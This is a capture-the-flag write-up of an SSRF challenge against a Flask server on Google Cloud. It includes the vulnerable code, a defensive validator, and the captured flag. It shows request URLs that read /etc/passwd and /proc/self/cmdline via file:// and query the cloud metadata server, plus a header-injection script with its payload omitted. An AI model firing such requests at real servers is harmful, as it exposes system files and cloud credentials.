Tags: ssrf gcloud buckets cloud

Rating: 5.0

This web server has an SSRF vulnerability. We can fetch files on the system:

http://35.194.175.80:8000/query?site=file:///etc/passwd

We can also visit internal sites, like for example the Google metadata API.

I first fetched the /opt/workdir/main-dc1e2f5f7a4f359bb5ce1317a.py file by leaking the command line from /proc/self/cmdline:

```python
from flask import Flask, request
import urllib.request

app = Flask(__name__)

@app.route("/query")
def query():
    site = request.args.get('site')
    # The body of this handler was not in the leaked copy; reconstructed from the
    # behaviour observed above: urllib fetches whatever URL (file:// included) the
    # client supplies, and the response body is returned verbatim.
    text = urllib.request.urlopen(site).read().decode(errors="replace")
    return text

@app.route("/")
def hello_world():
    return "Hello, World!"  # body not in the leaked copy; placeholder

if __name__ == "__main__":
    app.run(debug=False, host="0.0.0.0", port=8000)
```


Looks like it is using urllib, which may be vulnerable to header injection.
The flag file name is pretty much unguessable (they said so in the challenge description), so we can't just guess its name and fetch the flag.
We need to find another way.

http://35.194.175.80:8000/query?site=http://metadata/computeMetadata/

But the legacy endpoints were disabled (like computeMetadata/v1beta, which doesn't require the Metadata-Flavor: Google header).
Since we may have a way to inject headers, we can try to inject the *Metadata-Flavor* header:

```python
#!/usr/bin/env python3
import requests
import sys

url = "http://35.194.175.80:8000/query"

# The query parameters (the crafted `site` value) are not included in the write-up.
params = {
}

# Joined by hand so that requests passes the string through without re-encoding it.
params_str = "&".join("%s=%s" % (k, v) for k, v in params.items())

r = requests.get(url, params=params_str)
print(r.text)
```
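The two weaknesses the write-up chains are the unrestricted URL scheme (file://) and the ability to reach the metadata host, with CR/LF in the URL as the header-injection channel. The following validator is an added example, not the challenge's code, showing the check that `query()` would need before calling `urlopen`; the `resolve` hook and the `_FAKE_DNS` table are assumptions so it runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Names of the GCE metadata server (the page uses the short "metadata" form).
BLOCKED_HOSTS = {"metadata", "metadata.google.internal", "localhost"}

def is_safe_target(site, resolve=socket.gethostbyname):
    """True only for an http(s) URL whose host resolves to a public address.

    `resolve` is a hypothetical hook so the check can run offline in tests;
    the default is the real resolver.
    """
    # Control characters (CR/LF included) are refused before parsing: they are
    # the channel through which an extra request header can be smuggled.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in site):
        return False
    try:
        parts = urlsplit(site)
    except ValueError:
        return False
    # file:// is how /etc/passwd and /proc/self/cmdline were read; allow http(s) only.
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname
    if not host or host.lower() in BLOCKED_HOSTS:
        return False
    try:  # IP literals are checked directly; names go through the resolver.
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            addr = ipaddress.ip_address(resolve(host))
    except (OSError, ValueError):
        return False
    # Link-local (169.254.0.0/16), RFC 1918, loopback etc. are all non-global.
    return addr.is_global

# Constructed resolver table so the demo runs without DNS.
_FAKE_DNS = {"example.com": "93.184.216.34",
             "metadata.google.internal": "169.254.169.254",
             "intranet.test": "10.0.0.5"}

def fake_resolve(host):
    if host not in _FAKE_DNS:
        raise OSError("constructed resolver: unknown host " + host)
    return _FAKE_DNS[host]

def classify(sites, resolve=fake_resolve):
    """Verdict for each candidate `site` value, keyed by the value."""
    return {s: is_safe_target(s, resolve) for s in sites}
```

Resolving the name here and letting `urlopen` resolve it again leaves a rebinding window; a production fix also pins the connection to the address that was checked and does not follow redirects blindly.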


Run the script and get a token for authorization (I also inserted this token into the script, but ended up using curl to finish this challenge instead).

Use the token to list buckets:

Download the correct container (there were a lot of containers, so I just downloaded them all; the container below is the right one that contains the flag).

FLAG: BALSN{What_permissions_does_the_service_account_need}